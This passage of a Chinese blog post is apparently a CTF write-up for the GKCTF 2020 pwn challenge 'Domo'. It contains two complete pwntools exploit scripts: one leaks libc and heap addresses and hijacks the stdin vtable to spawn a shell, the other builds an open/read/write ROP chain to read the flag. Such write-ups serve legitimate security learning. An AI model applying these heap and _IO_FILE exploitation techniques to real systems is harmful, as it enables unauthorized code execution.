class="hljs-number">0x30</span>,read_addr,prdi,<span class="hljs-number">1</span>,prsi,filename_addr+<span class="hljs-number">0x8</span>,prdx,<span class="hljs-number">0x100</span>,write_addr)</span><br><span class="line">p.sendlineafter(<span class="hljs-string">'&gt; '</span>,<span class="hljs-string">'5\n'</span>+orw)</span><br></pre></td></tr></table></figure>
<p>返回地址覆盖上了ROP，对了，这里的ROP用的是libc的。毕竟知道了libc的地址，libc的ROP偏移是一定的，ELF的好像不是，用起来比较麻烦。</p>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 203623.png" alt></p>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 204033.png" alt></p>
<h2 id="贴上exp"><a href="#贴上exp" class="headerlink" title="贴上exp"></a>贴上exp</h2><p><strong>getshell的exp</strong></p>
<figure class="highlight python hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *</span><br><span class="line"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="hljs-string">'DEBUG'</span></span><br><span class="line">context.binary = <span class="hljs-string">'./domo'</span></span><br><span class="line">elf = ELF(<span class="hljs-string">'./domo'</span>)</span><br><span class="line"></span><br><span class="line"><span class="hljs-keyword">if</span> sys.argv[<span class="hljs-number">1</span>] == <span class="hljs-string">'l'</span>:</span><br><span class="line">    p = process(<span class="hljs-string">'./domo'</span>)</span><br><span class="line">    libc = context.binary.libc</span><br><span class="line"><span class="hljs-keyword">else</span>:</span><br><span class="line">    p = remote(<span class="hljs-string">'node3.buuoj.cn'</span>,<span class="hljs-number">28773</span>)</span><br><span class="line">    libc = context.binary.libc</span><br><span class="line"></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">cmd_add</span><span class="hljs-params">(size,content)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'&gt; '</span>,<span class="hljs-string">'1'</span>)</span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'size:'</span>,str(size))</span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'content:'</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">cmd_del</span><span class="hljs-params">(index)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'&gt; '</span>,<span class="hljs-string">'2'</span>)</span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'index:'</span>,str(index))</span><br><span class="line"></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">cmd_show</span><span class="hljs-params">(index)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'&gt; '</span>,<span class="hljs-string">'3'</span>)</span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'index:\n'</span>,str(index))</span><br><span class="line">    <span class="hljs-keyword">return</span> p.recv(<span class="hljs-number">6</span>)</span><br><span class="line"></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">cmd_edit</span><span class="hljs-params">(addr,num)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'&gt; '</span>,<span class="hljs-string">'4'</span>)</span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'addr:'</span>,str(addr))</span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'num:'</span>,num)</span><br><span class="line"></span><br><span class="line">cmd_add(<span class="hljs-number">0x40</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># 0</span></span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># 1</span></span><br><span class="line"></span><br><span class="line"><span class="hljs-comment"># leak main_arena</span></span><br><span class="line">cmd_add(<span class="hljs-number">0xf0</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># 2</span></span><br><span class="line">cmd_add(<span class="hljs-number">0x10</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># 3</span></span><br><span class="line">offset = <span class="hljs-number">0x7ffff7bcdb78</span> - <span class="hljs-number">0x7ffff7bcdb0a</span></span><br><span class="line">cmd_del(<span class="hljs-number">2</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0xf0</span>,<span class="hljs-string">''</span>)</span><br><span class="line">main_arena = u64(cmd_show(<span class="hljs-number">2</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">'\x00'</span>)) + offset</span><br><span class="line">offset = <span class="hljs-number">0x7f3d7a680b78</span> - <span class="hljs-number">0x7f3d7a2bc000</span></span><br><span class="line">libc.address = main_arena - offset</span><br><span class="line">print(hex(main_arena))</span><br><span class="line">print(hex(libc.address))</span><br><span class="line"><span class="hljs-comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line"><span class="hljs-comment"># leak heap_addr</span></span><br><span class="line">cmd_add(<span class="hljs-number">0x10</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># 4</span></span><br><span class="line">cmd_del(<span class="hljs-number">3</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">4</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x10</span>,<span class="hljs-string">''</span>)</span><br><span class="line">heap_addr = u64(cmd_show(<span class="hljs-number">3</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">'\x00'</span>)) - <span class="hljs-number">0x10a</span> + <span class="hljs-number">0x10</span></span><br><span class="line">print(hex(heap_addr))</span><br><span class="line"><span class="hljs-comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line"><span class="hljs-comment"># overlapping</span></span><br><span class="line">cmd_del(<span class="hljs-number">0</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x40</span>,flat(<span class="hljs-number">0</span>,<span class="hljs-number">0xb1</span>,heap_addr+<span class="hljs-number">0x18</span>,heap_addr+<span class="hljs-number">0x20</span>,heap_addr+<span class="hljs-number">0x10</span>))</span><br><span class="line">cmd_del(<span class="hljs-number">1</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x68</span>,flat(<span class="hljs-string">'\x00'</span>*<span class="hljs-number">0x60</span>,<span class="hljs-number">0xb0</span>))</span><br><span class="line">cmd_del(<span class="hljs-number">2</span>)</span><br><span class="line"><span class="hljs-comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line"><span class="hljs-comment"># fastbins attack overwrite vtable</span></span><br><span class="line">_IO_file_jumps = libc.sym[<span class="hljs-string">'_IO_file_jumps'</span>]</span><br><span class="line">_IO_2_1_stdin_ = libc.sym[<span class="hljs-string">'_IO_2_1_stdin_'</span>]</span><br><span class="line">fake_chunk = _IO_2_1_stdin_ + <span class="hljs-number">160</span> - <span class="hljs-number">0x3</span></span><br><span class="line">fake_vtable = heap_addr + <span class="hljs-number">0x210</span></span><br><span class="line">one_gadgets = [<span class="hljs-number">0x45216</span>,<span class="hljs-number">0x4526a</span>,<span class="hljs-number">0xf02a4</span>,<span class="hljs-number">0xf1147</span>]</span><br><span class="line">one_gadget = libc.address + one_gadgets[<span class="hljs-number">2</span>]</span><br><span class="line">print(hex(_IO_file_jumps))</span><br><span class="line">print(hex(_IO_2_1_stdin_))</span><br><span class="line">print(hex(fake_vtable))</span><br><span class="line">print(hex(one_gadget))</span><br><span class="line"></span><br><span class="line">cmd_add(<span class="hljs-number">0xc0</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">4</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">1</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">2</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0xc0</span>,flat(<span class="hljs-string">'\x00'</span>*<span class="hljs-number">0x38</span>,<span class="hljs-number">0x71</span>,fake_chunk))</span><br><span class="line">cmd_add(<span class="hljs-number">0xa8</span>,p64(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span>+p64(one_gadget)*<span class="hljs-number">19</span>)</span><br><span class="line">payload = <span class="hljs-string">'\x00'</span>*<span class="hljs-number">3</span>+flat(<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0xffffffff</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,fake_vtable,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">cmd_add(<span class="hljs-number">0x63</span>,payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p><strong>读flag的exp</strong></p>
<figure class="highlight python hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *</span><br><span class="line"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="hljs-string">'DEBUG'</span></span><br><span class="line">context.binary = <span class="hljs-string">'./domo'</span></span><br><span class="line">elf = ELF(<span class="hljs-string">'./domo'</span>)</span><br><span class="line"></span><br><span class="line"><span class="hljs-keyword">if</span> sys.argv[<span class="hljs-number">1</span>] == <span class="hljs-string">'l'</span>:</span><br><span class="line">    p = process(<span class="hljs-string">'./domo'</span>)</span><br><span class="line">    libc = context.binary.libc</span><br><span class="line"><span class="hljs-keyword">else</span>:</span><br><span class="line">    p = remote(<span class="hljs-string">'node3.buuoj.cn'</span>,<span class="hljs-number">29288</span>)</span><br><span class="line">    libc = context.binary.libc</span><br><span class="line"></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">cmd_add</span><span class="hljs-params">(size,content)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'&gt; '</span>,<span class="hljs-string">'1'</span>)</span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'size:'</span>,str(size))</span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'content:'</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">cmd_del</span><span class="hljs-params">(index)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'&gt; '</span>,<span class="hljs-string">'2'</span>)</span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'index:'</span>,str(index))</span><br><span class="line"></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">cmd_show</span><span class="hljs-params">(index)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'&gt; '</span>,<span class="hljs-string">'3'</span>)</span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'index:\n'</span>,str(index))</span><br><span class="line">    <span class="hljs-keyword">return</span> p.recv(<span class="hljs-number">6</span>)</span><br><span class="line"></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">cmd_edit</span><span class="hljs-params">(addr,num)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'&gt; '</span>,<span class="hljs-string">'4'</span>)</span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'addr:'</span>,str(addr))</span><br><span class="line">    p.sendlineafter(<span class="hljs-string">'num:'</span>,num)</span><br><span class="line"></span><br><span class="line">cmd_add(<span class="hljs-number">0x40</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># 0</span></span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># 1</span></span><br><span class="line"></span><br><span class="line"><span class="hljs-comment"># leak main_arena</span></span><br><span class="line">cmd_add(<span class="hljs-number">0xf0</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># 2</span></span><br><span class="line">cmd_add(<span class="hljs-number">0x10</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># 3</span></span><br><span class="line">offset = <span class="hljs-number">0x7ffff7bcdb78</span> - <span class="hljs-number">0x7ffff7bcdb0a</span></span><br><span class="line">cmd_del(<span class="hljs-number">2</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0xf0</span>,<span class="hljs-string">''</span>)</span><br><span class="line">main_arena = u64(cmd_show(<span class="hljs-number">2</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">'\x00'</span>)) + offset</span><br><span class="line">offset = <span class="hljs-number">0x7f3d7a680b78</span> - <span class="hljs-number">0x7f3d7a2bc000</span></span><br><span class="line">libc.address = main_arena - offset</span><br><span class="line">print(hex(main_arena))</span><br><span class="line">print(hex(libc.address))</span><br><span class="line"><span class="hljs-comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line"><span class="hljs-comment"># leak heap_addr</span></span><br><span class="line">cmd_add(<span class="hljs-number">0x10</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># 4</span></span><br><span class="line">cmd_del(<span class="hljs-number">3</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">4</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x10</span>,<span class="hljs-string">''</span>)</span><br><span class="line">heap_addr = u64(cmd_show(<span class="hljs-number">3</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">'\x00'</span>)) - <span class="hljs-number">0x10a</span> + <span class="hljs-number">0x10</span></span><br><span class="line">print(hex(heap_addr))</span><br><span class="line"><span class="hljs-comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line"><span class="hljs-comment"># overlapping</span></span><br><span class="line">cmd_del(<span class="hljs-number">0</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x40</span>,flat(<span class="hljs-number">0</span>,<span class="hljs-number">0xb1</span>,heap_addr+<span class="hljs-number">0x18</span>,heap_addr+<span class="hljs-number">0x20</span>,heap_addr+<span class="hljs-number">0x10</span>))</span><br><span class="line">cmd_del(<span class="hljs-number">1</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x68</span>,flat(<span class="hljs-string">'\x00'</span>*<span class="hljs-number">0x60</span>,<span class="hljs-number">0xb0</span>))</span><br><span class="line">cmd_del(<span class="hljs-number">2</span>)</span><br><span class="line"><span class="hljs-comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line"><span class="hljs-comment"># fastbins attack leak stack addr</span></span><br><span class="line">environ_addr = libc.sym[<span class="hljs-string">'environ'</span>]</span><br><span class="line">stdout_hook = libc.sym[<span class="hljs-string">"_IO_2_1_stdout_"</span>]</span><br><span class="line">_IO_file_jumps = libc.sym[<span class="hljs-string">'_IO_file_jumps'</span>]</span><br><span class="line">fake_chunk = stdout_hook - <span class="hljs-number">0x43</span></span><br><span class="line">print(hex(environ_addr))</span><br><span class="line">print(hex(stdout_hook))</span><br><span class="line">cmd_add(<span class="hljs-number">0xc0</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">4</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">1</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">2</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0xc0</span>,flat(<span class="hljs-string">'\x00'</span>*<span class="hljs-number">0x38</span>,<span class="hljs-number">0x71</span>,fake_chunk))</span><br><span class="line">payload = <span class="hljs-string">'\x00'</span>*<span class="hljs-number">3</span>+flat(<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,libc.sym[<span class="hljs-string">'_IO_file_jumps'</span>],<span class="hljs-number">0xfbad1800</span>,stdout_hook+<span class="hljs-number">131</span>,stdout_hook+<span class="hljs-number">131</span>,stdout_hook+<span class="hljs-number">131</span>,environ_addr,environ_addr+<span class="hljs-number">8</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x68</span>,payload)</span><br><span class="line">p.recvline()</span><br><span class="line">ret_addr = u64(p.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">'\x00'</span>)) - <span class="hljs-number">0xf0</span></span><br><span class="line">print(hex(ret_addr))</span><br><span class="line"></span><br><span class="line"><span class="hljs-comment"># overwrite return address</span></span><br><span class="line">stdin_hook = libc.sym[<span class="hljs-string">"_IO_2_1_stdin_"</span>]</span><br><span class="line">print(hex(stdin_hook))</span><br><span class="line"><span class="hljs-comment"># fake_chunk = stdin_hook - 0x13 # maclloc函数会出错</span></span><br><span class="line">fake_chunk = stdin_hook - <span class="hljs-number">0x28</span></span><br><span class="line">print(hex(fake_chunk))</span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">5</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">2</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">1</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0xc0</span>,flat(<span class="hljs-string">'\x00'</span>*<span class="hljs-number">0x38</span>,<span class="hljs-number">0x71</span>,fake_chunk))</span><br><span class="line">cmd_add(<span class="hljs-number">0x40</span>,<span class="hljs-string">'flag\x00'</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>)</span><br><span class="line"><span class="hljs-comment"># payload = '\x00'*3+flat(0xfbad1800,0,0,0,0,0,0,ret_addr-2,ret_addr+8,0,0,0)</span></span><br><span class="line">payload = flat(<span class="hljs-number">0</span>,_IO_file_jumps,<span class="hljs-number">0</span>,<span class="hljs-number">0xfbad1800</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,ret_addr<span class="hljs-number">-2</span>,ret_addr+<span class="hljs-number">0x118</span>) <span class="hljs-comment"># 减2为了放5\n</span></span><br><span class="line">print(hex(len(payload)))</span><br><span class="line"><span class="hljs-comment"># gdb.attach(p)</span></span><br><span class="line">cmd_edit(stdin_hook<span class="hljs-number">-0x20</span>,<span class="hljs-string">'\x7f'</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,payload)</span><br><span class="line"></span><br><span class="line">prdi = libc.search(asm(<span class="hljs-string">"pop rdi\nret"</span>)).next()</span><br><span class="line">prsi = libc.search(asm(<span class="hljs-string">"pop rsi\nret"</span>)).next()</span><br><span class="line">prdx = libc.search(asm(<span class="hljs-string">"pop rdx\nret"</span>)).next()</span><br><span class="line">open_addr = libc.sym[<span class="hljs-string">'open'</span>]</span><br><span class="line">read_addr = libc.sym[<span class="hljs-string">'read'</span>]</span><br><span class="line">write_addr = libc.sym[<span class="hljs-string">'write'</span>]</span><br><span class="line">filename_addr = heap_addr + <span class="hljs-number">0x210</span></span><br><span class="line">orw = flat(prdi,filename_addr,prsi,<span class="hljs-number">72</span>,open_addr,prdi,<span class="hljs-number">3</span>,prsi,filename_addr+<span class="hljs-number">0x8</span>,prdx,<span class="hljs-number">0x30</span>,read_addr,prdi,<span class="hljs-number">1</span>,prsi,filename_addr+<span class="hljs-number">0x8</span>,prdx,<span class="hljs-number">0x100</span>,write_addr)</span><br><span class="line">print(hex(len(orw)))</span><br><span class="line">gdb.attach(p)</span><br><span class="line">p.sendlineafter(<span class="hljs-string">'&gt; '</span>,<span class="hljs-string">'5\n'</span>+orw)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>再说一遍，这题出得真不错，学到了很多东西，特别是关于<strong>_IO_FILE</strong>知识点。说句老话，<strong>心细挖天下</strong>，我做这题时候不够细心，以至于踩了不少坑，而且前面两个师傅水平很高，对于这题用到的技巧都很熟练了，所以写的writeup有些细节没说，我这菜鸡缺少些前置的知识，有些地方看不懂，所以写了这篇水文，也为后面的师傅填填坑。</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a href="http://www.starssgo.top/2020/05/24/GKCTF-pwn-Domo/" target="_blank" rel="noopener">GKCTF_pwn_Domo(出题人角度)</a></p>
<p><a href="https://nocbtm.github.io/2020/05/24/GKCTF-pwn-writeup/#domo" target="_blank" rel="noopener">GKCTF pwn writeup</a></p>
<p><a href="https://b0ldfrev.gitbook.io/note/pwn/iofile-li-yong-si-lu-zong-jie" target="_blank" rel="noopener">_IO_FILE利用思路总结</a></p>
<p><a href="http://pzhxbz.cn/?p=139" target="_blank" rel="noopener">利用stdout来处理无leak的堆题</a></p>

        </div>
        
            <ul class="post-copyright">
            <li><strong>本文标题：</strong><a href="http://127.0.0.1/2020/05/27/GKCTF 2020 Domo分析/">[PWN]GKCTF 2020 Domo分析</a></li>
            <li><strong>本文作者：</strong><a href="http://127.0.0.1">P1ay2win</a></li>
            <li><strong>本文链接：</strong><a href="http://127.0.0.1/2020/05/27/GKCTF 2020 Domo分析/">http://127.0.0.1/2020/05/27/GKCTF 2020 Domo分析/</a></li>
            <li><strong>发布时间：</strong>2020-05-27</li>
            <li><strong>版权声明：</strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！
            </li>
            </ul>
        
        
        <div class="level is-size-7 is-uppercase">
            <div class="level-start">
                <div class="level-item">
                    <span class="is-size-6 has-text-grey has-mr-7">#</span>
                    <a class="has-link-grey -link" href="/tags/HeapOverflow/">HeapOverflow</a>, <a class="has-link-grey -link" href="/tags/IO-file/">IO_file</a>, <a class="has-link-grey -link" href="/tags/ORW/">ORW</a>
                </div>
            </div>
        </div>
        
        
        
    </div>
</div>





<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/2020/06/11/Geisha-walkthrough/">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">Geisha walkthrought</span>
            </a>
        </div>
        
        
        <div class="level-end">
            <a class="level level-item has-link-grey  article-nav-next" href="/2020/05/26/GKCTF_2020_Writeup/">
                <span class="level-item">GKCTF_2020_Writeup</span>
                <i class="level-item fas fa-chevron-right"></i>
            </a>
        </div>
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="title is-5 has-text-weight-normal">评论</h3>
        
<div id="comment-container"></div>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.css">
<script src="https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.min.js"></script>
<script>
    var gitalk = new Gitalk({
        clientID: '372fb49f2243341bf93b',
        clientSecret: 'b79da9cd60cecc3af662428f1daa6e01b1702d75',
        id: '9d983298775839a11ecdc4e0ebf403cd',
        repo: 'p1ay2win.github.io',
        owner: 'p1ay2win',
        admin: "p1ay2win",
        createIssueManually: false,
        distractionFreeMode: false
    })
    gitalk.render('comment-container')
</script>


    </div>
</div>

</div>
                




<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-1 column-left ">
    
        
<div class="card widget">
    <div class="card-content">
        <nav class="level">
            <div class="level-item has-text-centered" style="flex-shrink: 1">
                <div>
                    
                    <figure class="image is-128x128 has-mb-6">
                        <img class="is-rounded" src="/images/header.png" alt="p1ay2win">
                    </figure>
                    
                    <p class="is-size-4 is-block">
                        p1ay2win
                    </p>
                    
                    
                    <p class="is-size-6 is-block">
                        他们的爱与风华，只问自由，只问盛放，只问深情，只问初心，只问勇敢，无问西东。
                    </p>
                    
                    
                    <p class="is-size-6 is-flex is-flex-center has-text-grey">
                        <i class="fas fa-map-marker-alt has-mr-7"></i>
                        <span>CN</span>
                    </p>
                    
                </div>
            </div>
        </nav>
        <nav class="level is-mobile">
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        文章
                    </p>
                    <p class="title has-text-weight-normal">
                        39
                    </p>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        分类
                    </p>
                    <p class="title has-text-weight-normal">
                        7
                    </p>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        标签
                    </p>
                    <p class="title has-text-weight-normal">
                        35
                    </p>
                </div>
            </div>
        </nav>
        
        <div class="level">
            <a class="level-item button is-link is-rounded" href="https://p1ay2win.github.io" target="_blank">
                关注我</a>
        </div>
        
        
        
        <div class="level is-mobile">
            
